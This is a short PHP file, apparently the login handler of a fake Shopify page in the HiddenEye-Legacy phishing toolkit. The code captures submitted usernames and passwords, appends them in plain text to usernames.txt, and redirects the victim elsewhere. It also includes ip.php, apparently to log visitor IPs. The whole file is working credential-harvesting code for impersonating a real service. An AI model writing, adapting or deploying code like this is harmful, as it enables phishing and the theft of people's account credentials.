HiddenEye-Legacy/WebPages/shopify/login.php

8 lines
184 B
PHP
Raw Normal View History

2019-04-21 18:15:25 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['login'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();